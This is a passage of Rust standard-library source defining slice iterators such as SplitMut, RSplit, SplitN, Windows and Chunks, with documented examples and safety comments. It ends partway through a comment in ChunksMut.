impl<T: fmt::Debug, P> fmt::Debug for SplitInclusive<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitInclusive")
.field("v", &self.v)
.field("finished", &self.finished)
.finish()
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> Clone for SplitInclusive<'_, T, P>
where
P: Clone + FnMut(&T) -> bool,
{
fn clone(&self) -> Self {
SplitInclusive { v: self.v, pred: self.pred.clone(), finished: self.finished }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> Iterator for SplitInclusive<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
let idx =
self.v.iter().position(|x| (self.pred)(x)).map(|idx| idx + 1).unwrap_or(self.v.len());
if idx == self.v.len() {
self.finished = true;
}
let ret = Some(&self.v[..idx]);
self.v = &self.v[idx..];
ret
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished { (0, Some(0)) } else { (1, Some(self.v.len() + 1)) }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> DoubleEndedIterator for SplitInclusive<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.finished {
return None;
}
// The last index of self.v is already checked and found to match
// by the last iteration, so we start searching a new match
// one index to the left.
let remainder = if self.v.is_empty() { &[] } else { &self.v[..(self.v.len() - 1)] };
let idx = remainder.iter().rposition(|x| (self.pred)(x)).map(|idx| idx + 1).unwrap_or(0);
if idx == 0 {
self.finished = true;
}
let ret = Some(&self.v[idx..]);
self.v = &self.v[..idx];
ret
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> FusedIterator for SplitInclusive<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the mutable subslices of the slice which are separated
/// by elements that match `pred`.
///
/// This struct is created by the [`split_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut v = [10, 40, 30, 20, 60, 50];
/// let iter = v.split_mut(|num| *num % 3 == 0);
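/// // Each yielded subslice can be mutated in place; here we overwrite the
/// // first element of every group:
/// for group in iter {
///     group[0] = 1;
/// }
/// assert_eq!(v, [1, 40, 30, 1, 60, 1]);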
/// ```
///
/// [`split_mut`]: ../../std/primitive.slice.html#method.split_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a mut [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitMut").field("v", &self.v).field("finished", &self.finished).finish()
}
}
impl<'a, T, P> SplitIter for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a mut [T]> {
if self.finished {
None
} else {
self.finished = true;
Some(mem::replace(&mut self.v, &mut []))
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> Iterator for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().position(|x| (*pred)(x))
};
match idx_opt {
None => self.finish(),
Some(idx) => {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = &mut tail[1..];
Some(head)
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished {
(0, Some(0))
} else {
// if the predicate doesn't match anything, we yield one slice
// if it matches every element, we yield len+1 empty slices.
(1, Some(self.v.len() + 1))
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T, P> DoubleEndedIterator for SplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().rposition(|x| (*pred)(x))
};
match idx_opt {
None => self.finish(),
Some(idx) => {
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = head;
Some(&mut tail[1..])
}
}
}
}
#[stable(feature = "fused", since = "1.26.0")]
impl<T, P> FusedIterator for SplitMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the mutable subslices of the slice which are separated
/// by elements that match `pred`. Unlike `SplitMut`, it contains the matched
/// parts at the ends of the subslices.
///
/// This struct is created by the [`split_inclusive_mut`] method on [slices].
///
/// # Example
///
/// ```
/// #![feature(split_inclusive)]
///
/// let mut v = [10, 40, 30, 20, 60, 50];
/// let iter = v.split_inclusive_mut(|num| *num % 3 == 0);
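/// // The matched element terminates each subslice, so overwriting the last
/// // element of every group replaces the separators (and the final element):
/// for group in iter {
///     let last = group.len() - 1;
///     group[last] = 1;
/// }
/// assert_eq!(v, [10, 40, 1, 20, 1, 1]);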
/// ```
///
/// [`split_inclusive_mut`]: ../../std/primitive.slice.html#method.split_inclusive_mut
/// [slices]: ../../std/primitive.slice.html
#[unstable(feature = "split_inclusive", issue = "72360")]
pub struct SplitInclusiveMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
v: &'a mut [T],
pred: P,
finished: bool,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitInclusiveMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { v: slice, pred, finished: false }
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T: fmt::Debug, P> fmt::Debug for SplitInclusiveMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitInclusiveMut")
.field("v", &self.v)
.field("finished", &self.finished)
.finish()
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> Iterator for SplitInclusiveMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = {
// work around borrowck limitations
let pred = &mut self.pred;
self.v.iter().position(|x| (*pred)(x))
};
let idx = idx_opt.map(|idx| idx + 1).unwrap_or(self.v.len());
if idx == self.v.len() {
self.finished = true;
}
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = tail;
Some(head)
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.finished {
(0, Some(0))
} else {
// if the predicate doesn't match anything, we yield one slice
// if it matches every element, we yield len+1 empty slices.
(1, Some(self.v.len() + 1))
}
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<'a, T, P> DoubleEndedIterator for SplitInclusiveMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
if self.finished {
return None;
}
let idx_opt = if self.v.is_empty() {
None
} else {
// work around borrowck limitations
let pred = &mut self.pred;
// The last index of self.v is already checked and found to match
// by the last iteration, so we start searching a new match
// one index to the left.
let remainder = &self.v[..(self.v.len() - 1)];
remainder.iter().rposition(|x| (*pred)(x))
};
let idx = idx_opt.map(|idx| idx + 1).unwrap_or(0);
if idx == 0 {
self.finished = true;
}
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(idx);
self.v = head;
Some(tail)
}
}
#[unstable(feature = "split_inclusive", issue = "72360")]
impl<T, P> FusedIterator for SplitInclusiveMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over subslices separated by elements that match a predicate
/// function, starting from the end of the slice.
///
/// This struct is created by the [`rsplit`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [11, 22, 33, 0, 44, 55];
/// let mut iter = slice.rsplit(|num| *num == 0);
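/// // The subslices are yielded back-to-front:
/// assert_eq!(iter.next(), Some(&[44, 55][..]));
/// assert_eq!(iter.next(), Some(&[11, 22, 33][..]));
/// assert_eq!(iter.next(), None);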
/// ```
///
/// [`rsplit`]: ../../std/primitive.slice.html#method.rsplit
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "slice_rsplit", since = "1.27.0")]
#[derive(Clone)] // FIXME: like #26925, this derive adds an unnecessary `T: Clone` bound; a manual impl (as on `Split`) would avoid it.
pub struct RSplit<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: Split<'a, T, P>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplit<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a [T], pred: P) -> Self {
Self { inner: Split::new(slice, pred) }
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplit<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplit")
.field("v", &self.inner.v)
.field("finished", &self.inner.finished)
.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> Iterator for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
self.inner.next_back()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> DoubleEndedIterator for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
self.inner.next()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> SplitIter for RSplit<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a [T]> {
self.inner.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T, P> FusedIterator for RSplit<'_, T, P> where P: FnMut(&T) -> bool {}
/// An iterator over the subslices of the slice which are separated
/// by elements that match `pred`, starting from the end of the slice.
///
/// This struct is created by the [`rsplit_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [11, 22, 33, 0, 44, 55];
/// let iter = slice.rsplit_mut(|num| *num == 0);
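/// // Groups are yielded back-to-front and can be mutated in place:
/// for group in iter {
///     group[0] = 1;
/// }
/// assert_eq!(slice, [1, 22, 33, 0, 1, 55]);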
/// ```
///
/// [`rsplit_mut`]: ../../std/primitive.slice.html#method.rsplit_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "slice_rsplit", since = "1.27.0")]
pub struct RSplitMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: SplitMut<'a, T, P>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitMut<'a, T, P> {
#[inline]
pub(super) fn new(slice: &'a mut [T], pred: P) -> Self {
Self { inner: SplitMut::new(slice, pred) }
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitMut")
.field("v", &self.inner.v)
.field("finished", &self.inner.finished)
.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> SplitIter for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn finish(&mut self) -> Option<&'a mut [T]> {
self.inner.finish()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> Iterator for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
self.inner.next_back()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<'a, T, P> DoubleEndedIterator for RSplitMut<'a, T, P>
where
P: FnMut(&T) -> bool,
{
#[inline]
fn next_back(&mut self) -> Option<&'a mut [T]> {
self.inner.next()
}
}
#[stable(feature = "slice_rsplit", since = "1.27.0")]
impl<T, P> FusedIterator for RSplitMut<'_, T, P> where P: FnMut(&T) -> bool {}
/// A private iterator over subslices separated by elements that
/// match a predicate function, splitting at most a fixed number of
/// times.
#[derive(Debug)]
struct GenericSplitN<I> {
iter: I,
count: usize,
}
impl<T, I: SplitIter<Item = T>> Iterator for GenericSplitN<I> {
type Item = T;
#[inline]
fn next(&mut self) -> Option<T> {
match self.count {
0 => None,
1 => {
self.count -= 1;
self.iter.finish()
}
_ => {
self.count -= 1;
self.iter.next()
}
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
let (lower, upper_opt) = self.iter.size_hint();
(lower, upper_opt.map(|upper| cmp::min(self.count, upper)))
}
}
/// An iterator over subslices separated by elements that match a predicate
/// function, limited to a given number of splits.
///
/// This struct is created by the [`splitn`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 30, 20, 60, 50];
/// let mut iter = slice.splitn(2, |num| *num % 3 == 0);
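/// // With a limit of 2, the second item is the unsplit remainder:
/// assert_eq!(iter.next(), Some(&[10, 40][..]));
/// assert_eq!(iter.next(), Some(&[20, 60, 50][..]));
/// assert_eq!(iter.next(), None);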
/// ```
///
/// [`splitn`]: ../../std/primitive.slice.html#method.splitn
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitN<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<Split<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitN<'a, T, P> {
#[inline]
pub(super) fn new(s: Split<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitN<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitN").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a
/// predicate function, limited to a given number of splits, starting
/// from the end of the slice.
///
/// This struct is created by the [`rsplitn`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = [10, 40, 30, 20, 60, 50];
/// let mut iter = slice.rsplitn(2, |num| *num % 3 == 0);
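/// // Splitting starts from the end, and the final item is the unsplit rest:
/// assert_eq!(iter.next(), Some(&[50][..]));
/// assert_eq!(iter.next(), Some(&[10, 40, 30, 20][..]));
/// assert_eq!(iter.next(), None);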
/// ```
///
/// [`rsplitn`]: ../../std/primitive.slice.html#method.rsplitn
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RSplitN<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<RSplit<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitN<'a, T, P> {
#[inline]
pub(super) fn new(s: RSplit<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitN<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitN").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a predicate
/// function, limited to a given number of splits.
///
/// This struct is created by the [`splitn_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.splitn_mut(2, |num| *num % 3 == 0);
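/// // Only one split happens, so the second group is the whole remainder:
/// for group in iter {
///     group[0] = 1;
/// }
/// assert_eq!(slice, [1, 40, 30, 1, 60, 50]);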
/// ```
///
/// [`splitn_mut`]: ../../std/primitive.slice.html#method.splitn_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct SplitNMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<SplitMut<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> SplitNMut<'a, T, P> {
#[inline]
pub(super) fn new(s: SplitMut<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for SplitNMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("SplitNMut").field("inner", &self.inner).finish()
}
}
/// An iterator over subslices separated by elements that match a
/// predicate function, limited to a given number of splits, starting
/// from the end of the slice.
///
/// This struct is created by the [`rsplitn_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = [10, 40, 30, 20, 60, 50];
/// let iter = slice.rsplitn_mut(2, |num| *num % 3 == 0);
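/// // Splitting starts from the end; the final group is the unsplit rest:
/// for group in iter {
///     group[0] = 1;
/// }
/// assert_eq!(slice, [1, 40, 30, 20, 60, 1]);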
/// ```
///
/// [`rsplitn_mut`]: ../../std/primitive.slice.html#method.rsplitn_mut
/// [slices]: ../../std/primitive.slice.html
#[stable(feature = "rust1", since = "1.0.0")]
pub struct RSplitNMut<'a, T: 'a, P>
where
P: FnMut(&T) -> bool,
{
inner: GenericSplitN<RSplitMut<'a, T, P>>,
}
impl<'a, T: 'a, P: FnMut(&T) -> bool> RSplitNMut<'a, T, P> {
#[inline]
pub(super) fn new(s: RSplitMut<'a, T, P>, n: usize) -> Self {
Self { inner: GenericSplitN { iter: s, count: n } }
}
}
#[stable(feature = "core_impl_debug", since = "1.9.0")]
impl<T: fmt::Debug, P> fmt::Debug for RSplitNMut<'_, T, P>
where
P: FnMut(&T) -> bool,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("RSplitNMut").field("inner", &self.inner).finish()
}
}
forward_iterator! { SplitN: T, &'a [T] }
forward_iterator! { RSplitN: T, &'a [T] }
forward_iterator! { SplitNMut: T, &'a mut [T] }
forward_iterator! { RSplitNMut: T, &'a mut [T] }
/// An iterator over overlapping subslices of length `size`.
///
/// This struct is created by the [`windows`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['r', 'u', 's', 't'];
/// let mut iter = slice.windows(2);
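/// // The windows overlap, advancing one element at a time:
/// assert_eq!(iter.next(), Some(&['r', 'u'][..]));
/// assert_eq!(iter.next(), Some(&['u', 's'][..]));
/// assert_eq!(iter.next(), Some(&['s', 't'][..]));
/// assert_eq!(iter.next(), None);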
/// ```
///
/// [`windows`]: ../../std/primitive.slice.html#method.windows
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Windows<'a, T: 'a> {
v: &'a [T],
size: usize,
}
impl<'a, T: 'a> Windows<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Windows<'_, T> {
fn clone(&self) -> Self {
Windows { v: self.v, size: self.size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for Windows<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.size > self.v.len() {
None
} else {
let ret = Some(&self.v[..self.size]);
self.v = &self.v[1..];
ret
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.size > self.v.len() {
(0, Some(0))
} else {
let size = self.v.len() - self.size + 1;
(size, Some(size))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = self.size.overflowing_add(n);
if end > self.v.len() || overflow {
self.v = &[];
None
} else {
let nth = &self.v[n..end];
self.v = &self.v[n + 1..];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.size > self.v.len() {
None
} else {
let start = self.v.len() - self.size;
Some(&self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
// SAFETY: since the caller guarantees that `i` is in bounds,
// which means that `i` cannot overflow an `isize`, and the
// slice created by `from_raw_parts` is a subslice of `self.v`
// thus is guaranteed to be valid for the lifetime `'a` of `self.v`.
unsafe { from_raw_parts(self.v.as_ptr().add(idx), self.size) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for Windows<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.size > self.v.len() {
None
} else {
let ret = Some(&self.v[self.v.len() - self.size..]);
self.v = &self.v[..self.v.len() - 1];
ret
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let (end, overflow) = self.v.len().overflowing_sub(n);
if end < self.size || overflow {
self.v = &[];
None
} else {
let ret = &self.v[end - self.size..end];
self.v = &self.v[..end - 1];
Some(ret)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for Windows<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for Windows<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for Windows<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Windows<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) chunks (`chunk_size` elements at a
/// time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`chunks`] method on [slices].
///
/// # Example
///
/// ```
/// let slice = ['l', 'o', 'r', 'e', 'm'];
/// let mut iter = slice.chunks(2);
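/// // The chunks do not overlap, and the last one holds the remainder:
/// assert_eq!(iter.next(), Some(&['l', 'o'][..]));
/// assert_eq!(iter.next(), Some(&['r', 'e'][..]));
/// assert_eq!(iter.next(), Some(&['m'][..]));
/// assert_eq!(iter.next(), None);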
/// ```
///
/// [`chunks`]: ../../std/primitive.slice.html#method.chunks
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct Chunks<'a, T: 'a> {
v: &'a [T],
chunk_size: usize,
}
impl<'a, T: 'a> Chunks<'a, T> {
#[inline]
pub(super) fn new(slice: &'a [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
// FIXME(#26925) Remove in favor of `#[derive(Clone)]`
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Clone for Chunks<'_, T> {
fn clone(&self) -> Self {
Chunks { v: self.v, chunk_size: self.chunk_size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for Chunks<'a, T> {
type Item = &'a [T];
#[inline]
fn next(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let chunksz = cmp::min(self.v.len(), self.chunk_size);
let (fst, snd) = self.v.split_at(chunksz);
self.v = snd;
Some(fst)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<Self::Item> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &[];
None
} else {
let end = match start.checked_add(self.chunk_size) {
Some(sum) => cmp::min(self.v.len(), sum),
None => self.v.len(),
};
let nth = &self.v[start..end];
self.v = &self.v[end..];
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let start = (self.v.len() - 1) / self.chunk_size * self.chunk_size;
Some(&self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
None => self.v.len(),
Some(end) => cmp::min(end, self.v.len()),
};
// SAFETY: the caller guarantees that `i` is in bounds,
// which means that `start` must be in bounds of the
// underlying `self.v` slice, and we made sure that `end`
// is also in bounds of `self.v`. Thus, `start` cannot overflow
// an `isize`, and the slice constructed by `from_raw_parts`
// is a subslice of `self.v` which is guaranteed to be valid
// for the lifetime `'a` of `self.v`.
unsafe { from_raw_parts(self.v.as_ptr().add(start), end - start) }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> DoubleEndedIterator for Chunks<'a, T> {
#[inline]
fn next_back(&mut self) -> Option<&'a [T]> {
if self.v.is_empty() {
None
} else {
let remainder = self.v.len() % self.chunk_size;
let chunksz = if remainder != 0 { remainder } else { self.chunk_size };
let (fst, snd) = self.v.split_at(self.v.len() - chunksz);
self.v = fst;
Some(snd)
}
}
#[inline]
fn nth_back(&mut self, n: usize) -> Option<Self::Item> {
let len = self.len();
if n >= len {
self.v = &[];
None
} else {
let start = (len - 1 - n) * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
Some(res) => cmp::min(res, self.v.len()),
None => self.v.len(),
};
let nth_back = &self.v[start..end];
self.v = &self.v[..start];
Some(nth_back)
}
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> ExactSizeIterator for Chunks<'_, T> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<T> TrustedLen for Chunks<'_, T> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<T> FusedIterator for Chunks<'_, T> {}
#[doc(hidden)]
#[unstable(feature = "trusted_random_access", issue = "none")]
unsafe impl<'a, T> TrustedRandomAccess for Chunks<'a, T> {
fn may_have_side_effect() -> bool {
false
}
}
/// An iterator over a slice in (non-overlapping) mutable chunks (`chunk_size`
/// elements at a time), starting at the beginning of the slice.
///
/// When the slice len is not evenly divided by the chunk size, the last slice
/// of the iteration will be the remainder.
///
/// This struct is created by the [`chunks_mut`] method on [slices].
///
/// # Example
///
/// ```
/// let mut slice = ['l', 'o', 'r', 'e', 'm'];
/// let iter = slice.chunks_mut(2);
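/// // Each chunk is yielded mutably; here we upper-case the first element of
/// // every chunk (the final chunk is just the remainder, `['m']`):
/// for chunk in iter {
///     chunk[0] = chunk[0].to_ascii_uppercase();
/// }
/// assert_eq!(slice, ['L', 'o', 'R', 'e', 'M']);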
/// ```
///
/// [`chunks_mut`]: ../../std/primitive.slice.html#method.chunks_mut
/// [slices]: ../../std/primitive.slice.html
#[derive(Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct ChunksMut<'a, T: 'a> {
v: &'a mut [T],
chunk_size: usize,
}
impl<'a, T: 'a> ChunksMut<'a, T> {
#[inline]
pub(super) fn new(slice: &'a mut [T], size: usize) -> Self {
Self { v: slice, chunk_size: size }
}
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, T> Iterator for ChunksMut<'a, T> {
type Item = &'a mut [T];
#[inline]
fn next(&mut self) -> Option<&'a mut [T]> {
if self.v.is_empty() {
None
} else {
let sz = cmp::min(self.v.len(), self.chunk_size);
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(sz);
self.v = tail;
Some(head)
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.v.is_empty() {
(0, Some(0))
} else {
let n = self.v.len() / self.chunk_size;
let rem = self.v.len() % self.chunk_size;
let n = if rem > 0 { n + 1 } else { n };
(n, Some(n))
}
}
#[inline]
fn count(self) -> usize {
self.len()
}
#[inline]
fn nth(&mut self, n: usize) -> Option<&'a mut [T]> {
let (start, overflow) = n.overflowing_mul(self.chunk_size);
if start >= self.v.len() || overflow {
self.v = &mut [];
None
} else {
let end = match start.checked_add(self.chunk_size) {
Some(sum) => cmp::min(self.v.len(), sum),
None => self.v.len(),
};
let tmp = mem::replace(&mut self.v, &mut []);
let (head, tail) = tmp.split_at_mut(end);
let (_, nth) = head.split_at_mut(start);
self.v = tail;
Some(nth)
}
}
#[inline]
fn last(self) -> Option<Self::Item> {
if self.v.is_empty() {
None
} else {
let start = (self.v.len() - 1) / self.chunk_size * self.chunk_size;
Some(&mut self.v[start..])
}
}
#[doc(hidden)]
unsafe fn __iterator_get_unchecked(&mut self, idx: usize) -> Self::Item {
let start = idx * self.chunk_size;
let end = match start.checked_add(self.chunk_size) {
None => self.v.len(),
Some(end) => cmp::min(end, self.v.len()),
};
// SAFETY: see comments for `Chunks::__iterator_get_unchecked`.
//
// Also note that the caller also guarantees that we're never called
// with the same index again, and that no other methods that will
// access this subslice are called, so it is valid for the returned
